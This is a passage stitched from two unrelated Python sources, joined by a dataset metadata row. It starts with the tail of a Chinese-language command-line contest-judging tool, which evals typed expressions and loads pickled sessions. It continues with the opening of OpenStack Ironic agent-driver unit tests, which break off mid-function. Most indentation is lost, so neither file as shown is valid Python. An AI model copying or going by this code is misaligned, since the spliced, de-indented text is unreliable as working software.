print("未知用户 %s" % pl)
return
try:
prob = self.Problems[pr]
except KeyError:
print("未知用户 %s" % pr)
return
player.Do(prob)
def help_quit (self):
print("quit")
print("退出")
def do_quit (self, line):
exit()
def help_name (self):
print("name [@名称]")
print("设置评测名称。若没有提供,显示当前名称")
def do_name (self, name):
if len(name.strip()) == 0:
            print(self.Name)
        else:
            self.Name = name
def help_addprob (self):
print("addprob @配置文件1 [@配置文件2 [...]]")
print("添加题目")
def do_addprob (self, line):
for path in shlex.split(line):
self.AddProb(path)
def help_delprob (self):
print("delprob @题目1 [@题目2 [...]]")
print("删除题目")
def do_delprob (self, line):
for name in shlex.split(line):
self.DelProb(name)
def help_prob (self):
print("prob")
print("显示所有题目")
def do_prob (self, line):
for p in self.Problems:
print("%s: %s" % (p, self.Problems[p].CfgFile))
def help_add (self):
print("add @目录1 [@目录2 [...]]")
print("添加选手")
def do_add (self, line):
for path in shlex.split(line):
self.AddPlayer(path)
def help_addall (self):
print("addall @目录1 [@目录2 [...]]")
print("添加目录中的所有文件夹作为选手")
def do_addall (self, line):
for path in shlex.split(line):
try:
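                # next(os.walk(path)) yields (dirpath, dirnames, filenames); [1] is the immediate subdirectories.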
paths = next(os.walk(path))[1]
except StopIteration:
continue
for f in paths:
self.AddPlayer(os.path.join(path, f))
def help_del (self):
print("del @选手1 [@选手2 [...]]")
print("删除选手")
def do_del (self, line):
for name in shlex.split(line):
self.DelPlayer(name)
def help_player (self):
print("player")
print("显示所有选手")
def do_player (self, line):
for p in self.Players:
print("%s: %s" % (p, self.Players[p].Path))
def help_rec (self):
print("rec @选手 @题目")
print("显示详细评测信息")
def do_rec (self, line):
arg = shlex.split(line)
if len(arg)==2:
pl, pr = arg
else:
return
try:
li = self.Players[pl].Record[pr]
except KeyError:
print("记录不存在")
return
for idx in li:
print()
print("[测试#%s]" % idx)
for dic in li[idx]:
print("<文件 %s>" % dic.get("file", ""))
print("信息: %s" % dic.get("msg", ""))
print("得分: %s" % dic.get("score", ""))
def help_print (self):
print("打印Python表达式")
def do_print (self, line):
try:
print(eval(line))
except Exception as err:
print(err)
def help_test (self):
print("启动测试")
def do_test (self, line):
arg = shlex.split(line)
if len(arg) == 2:
            self.Testit(*arg)
elif len(arg) == 0:
pls = input("测试对象(默认全部):").split()
prs = input("题目(默认全部):").split()
if len(pls) == 0:
pls = self.Players.keys()
if len(prs) == 0:
prs = self.Problems.keys()
for player in pls:
for prob in prs:
self.Testit(player, prob)
print()
def help_save (self):
print("储存本次测试")
def do_save (self, line):
path = shlex.split(line)[0]
if os.path.lexists(path):
while True:
ch = input("文件已存在,是否覆盖(Y/N)?")
if ch in ("y", "Y"):
break
elif ch in ("n", "N"):
return
f = open(path, "wb")
pickle.dump(self.Name, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Players, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Problems, f, pickle.HIGHEST_PROTOCOL)
f.close()
def help_load (self):
print("加载测试")
def do_load (self, line):
path = shlex.split(line)[0]
try:
f = open(path, "rb")
except IOError as err:
print(err)
return
self.Name = pickle.load(f)
self.Players = pickle.load(f)
        self.Problems = pickle.load(f)
        f.close()
if __name__ == '__main__':
pytest = PyTest_Cmd()
pytest.cmdloop()
| gpl-3.0 | 1,755,466,251,019,039,200 | 26 | 71 | 0.508379 | false |
devananda/ironic | ironic/tests/unit/drivers/modules/test_agent.py | 1 | 58308 | # Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import types
import mock
from oslo_config import cfg
from ironic.common import dhcp_factory
from ironic.common import exception
from ironic.common import image_service
from ironic.common import images
from ironic.common import raid
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent
from ironic.drivers.modules import agent_base_vendor
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import fake
from ironic.drivers.modules import pxe
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as object_utils
INSTANCE_INFO = db_utils.get_test_agent_instance_info()
DRIVER_INFO = db_utils.get_test_agent_driver_info()
DRIVER_INTERNAL_INFO = db_utils.get_test_agent_driver_internal_info()
CONF = cfg.CONF
class TestAgentMethods(db_base.DbTestCase):
def setUp(self):
super(TestAgentMethods, self).setUp()
self.node = object_utils.create_test_node(self.context,
driver='fake_agent')
dhcp_factory.DHCPFactory._dhcp_provider = None
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_image(self, glance_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = True
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare'}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_partition_image(
self, glance_mock, parse_instance_info_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
i_info['kernel'] = '13ce5a56-1de3-4916-b8b2-be778645d003'
i_info['ramdisk'] = 'a5a370a8-1b39-433f-be63-2c7d708e4b4e'
i_info['root_gb'] = 5
i_info['swap_mb'] = 4
i_info['ephemeral_gb'] = 0
i_info['ephemeral_format'] = None
i_info['configdrive'] = 'configdrive'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare',
'properties': {'kernel_id': 'kernel',
'ramdisk_id': 'ramdisk'}}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
glance_obj_mock = glance_mock.return_value
glance_obj_mock.swift_temp_url.return_value = 'temp-url'
parse_instance_info_mock.return_value = {'swap_mb': 4}
image_source = '733d1c44-a2ea-414b-aca7-69decf20d810'
expected_i_info = {'root_gb': 5,
'swap_mb': 4,
'ephemeral_gb': 0,
'ephemeral_format': None,
'configdrive': 'configdrive',
'image_source': image_source,
'image_url': 'temp-url',
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'image_type': 'partition',
'image_checksum': 'aa',
'fake_password': 'fakepass',
'image_container_format': 'bare',
'image_disk_format': 'qcow2',
'foo': 'bar'}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
image_type = task.node.instance_info.get('image_type')
self.assertEqual('partition', image_type)
self.assertEqual('kernel', info.get('kernel'))
self.assertEqual('ramdisk', info.get('ramdisk'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_image(
self, validate_href_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
i_info['image_source'] = 'http://image-ref'
i_info['image_checksum'] = 'aa'
i_info['root_gb'] = 10
i_info['image_checksum'] = 'aa'
driver_internal_info['is_whole_disk_image'] = True
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_partition_image(
self, validate_href_mock, parse_instance_info_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
i_info['image_source'] = 'http://image-ref'
i_info['kernel'] = 'http://kernel-ref'
i_info['ramdisk'] = 'http://ramdisk-ref'
i_info['image_checksum'] = 'aa'
i_info['root_gb'] = 10
driver_internal_info['is_whole_disk_image'] = False
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
validate_href_mock.side_effect = ['http://image-ref',
'http://kernel-ref',
'http://ramdisk-ref']
parse_instance_info_mock.return_value = {'swap_mb': 5}
expected_i_info = {'image_source': 'http://image-ref',
'image_url': 'http://image-ref',
'image_type': 'partition',
'kernel': 'http://kernel-ref',
'ramdisk': 'http://ramdisk-ref',
'image_checksum': 'aa',
'root_gb': 10,
'swap_mb': 5,
'fake_password': 'fakepass',
'foo': 'bar'}
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
self.assertEqual('partition', info.get('image_type'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonsupported_image(
self, validate_href_mock):
validate_href_mock.side_effect = iter(
[exception.ImageRefValidationFailed(
image_href='file://img.qcow2', reason='fail')])
i_info = self.node.instance_info
i_info['image_source'] = 'file://img.qcow2'
i_info['image_checksum'] = 'aa'
self.node.instance_info = i_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.ImageRefValidationFailed,
agent.build_instance_info_for_deploy, task)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size(self, show_mock):
show_mock.return_value = {
'size': 10 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_without_memory_mb(self, show_mock):
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties.pop('memory_mb', None)
agent.check_image_size(task, 'fake-image')
self.assertFalse(show_mock.called)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail(self, show_mock):
show_mock.return_value = {
'size': 11 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail_by_agent_consumed_memory(self, show_mock):
self.config(memory_consumed_by_agent=2, group='agent')
show_mock.return_value = {
'size': 9 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_enabled(self, show_mock):
CONF.set_override('stream_raw_images', True, 'agent')
# Image is bigger than memory but it's raw and will be streamed
# so the test should pass
show_mock.return_value = {
'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_disabled(self, show_mock):
CONF.set_override('stream_raw_images', False, 'agent')
show_mock.return_value = {
'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
# Image is raw but stream is disabled, so test should fail since
# the image is bigger than the RAM size
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
class TestAgentDeploy(db_base.DbTestCase):
def setUp(self):
super(TestAgentDeploy, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
self.driver = agent.AgentDeploy()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
self.ports = [
object_utils.create_test_port(self.context, node_id=self.node.id)]
dhcp_factory.DHCPFactory._dhcp_provider = None
def test_get_properties(self):
expected = agent.COMMON_PROPERTIES
self.assertEqual(expected, self.driver.get_properties())
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate(self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_driver_info_manage_agent_boot_false(
self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
self.config(manage_agent_boot=False, group='agent')
self.node.driver_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
self.assertFalse(pxe_boot_validate_mock.called)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_instance_info_missing_params(
self, pxe_boot_validate_mock):
self.node.instance_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
e = self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
self.assertIn('instance_info.image_source', str(e))
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_nonglance_image_no_checksum(
self, pxe_boot_validate_mock):
i_info = self.node.instance_info
i_info['image_source'] = 'http://image-ref'
del i_info['image_checksum']
self.node.instance_info = i_info
self.node.save()
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_root_device_hints(
self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_proxies(self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.driver_info.update({
'image_https_proxy': 'git://spam.ni',
'image_http_proxy': 'http://spam.ni',
'image_no_proxy': '1' * 500})
self.assertRaisesRegexp(exception.InvalidParameterValue,
'image_https_proxy.*image_no_proxy',
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_deploy(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.deploy(task)
self.assertEqual(driver_return, states.DEPLOYWAIT)
power_mock.assert_called_once_with(task, states.REBOOT)
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_tear_down(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.tear_down(task)
power_mock.assert_called_once_with(task, states.POWER_OFF)
self.assertEqual(driver_return, states.DELETED)
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare(self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
build_options_mock.return_value = {'a': 'b'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
build_options_mock.assert_called_once_with(task.node)
pxe_prepare_ramdisk_mock.assert_called_once_with(
task, {'a': 'b'})
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_manage_agent_boot_false(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_active(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.ACTIVE
self.driver.prepare(task)
self.assertFalse(build_instance_info_mock.called)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up(self, pxe_clean_up_ramdisk_mock, clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.clean_up(task)
pxe_clean_up_ramdisk_mock.assert_called_once_with(task)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up_manage_agent_boot_false(self, pxe_clean_up_ramdisk_mock,
clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.config(group='agent', manage_agent_boot=False)
self.driver.clean_up(task)
self.assertFalse(pxe_clean_up_ramdisk_mock.called)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps(self, mock_get_clean_steps):
# Test getting clean steps
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
steps = self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': None})
self.assertEqual(mock_steps, steps)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps_config_priority(self, mock_get_clean_steps):
# Test that we can override the priority of get clean steps
# Use 0 because it is an edge case (false-y) and used in devstack
self.config(erase_devices_priority=0, group='deploy')
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': 0})
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning(self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning_manage_agent_boot_false(
self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning(self, tear_down_cleaning_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning_manage_agent_boot_false(
self, tear_down_cleaning_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
class TestAgentVendor(db_base.DbTestCase):
def setUp(self):
super(TestAgentVendor, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
def _test_continue_deploy(self, additional_driver_info=None,
additional_expected_image_info=None):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info.update(additional_driver_info or {})
self.node.driver_info = driver_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': CONF.agent.stream_raw_images,
}
expected_image_info.update(additional_expected_image_info or {})
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
def test_continue_deploy(self):
self._test_continue_deploy()
def test_continue_deploy_with_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_https_proxy': 'https://spam.ni',
'image_http_proxy': 'spam.ni',
'image_no_proxy': '.eggs.com'},
additional_expected_image_info={
'proxies': {'https': 'https://spam.ni',
'http': 'spam.ni'},
'no_proxy': '.eggs.com'}
)
def test_continue_deploy_with_no_proxy_without_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_no_proxy': '.eggs.com'}
)
def test_continue_deploy_image_source_is_url(self):
instance_info = self.node.instance_info
instance_info['image_source'] = 'http://example.com/woof.img'
self.node.instance_info = instance_info
self._test_continue_deploy(
additional_expected_image_info={
'id': 'woof.img'
}
)
def test_continue_deploy_partition_image(self):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
i_info = self.node.instance_info
i_info['kernel'] = 'kernel'
i_info['ramdisk'] = 'ramdisk'
i_info['root_gb'] = 10
i_info['swap_mb'] = 10
i_info['ephemeral_mb'] = 0
i_info['ephemeral_format'] = 'abc'
i_info['configdrive'] = 'configdrive'
i_info['preserve_ephemeral'] = False
i_info['image_type'] = 'partition'
i_info['root_mb'] = 10240
i_info['deploy_boot_mode'] = 'bios'
i_info['capabilities'] = {"boot_option": "local",
"disk_label": "msdos"}
self.node.instance_info = i_info
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'node_uuid': self.node.uuid,
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': True,
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'root_gb': 10,
'swap_mb': 10,
'ephemeral_mb': 0,
'ephemeral_format': 'abc',
'configdrive': 'configdrive',
'preserve_ephemeral': False,
'image_type': 'partition',
'root_mb': 10240,
'boot_option': 'local',
'deploy_boot_mode': 'bios',
'disk_label': 'msdos'
}
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance(self, clean_pxe_mock, check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock, node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
self.passthru.reboot_to_instance(task)
clean_pxe_mock.assert_called_once_with(task.driver.boot, task)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertFalse(prepare_mock.called)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
self.assertFalse(uuid_mock.called)
@mock.patch.object(deploy_utils, 'get_boot_mode_for_deploy', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_partition_image(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
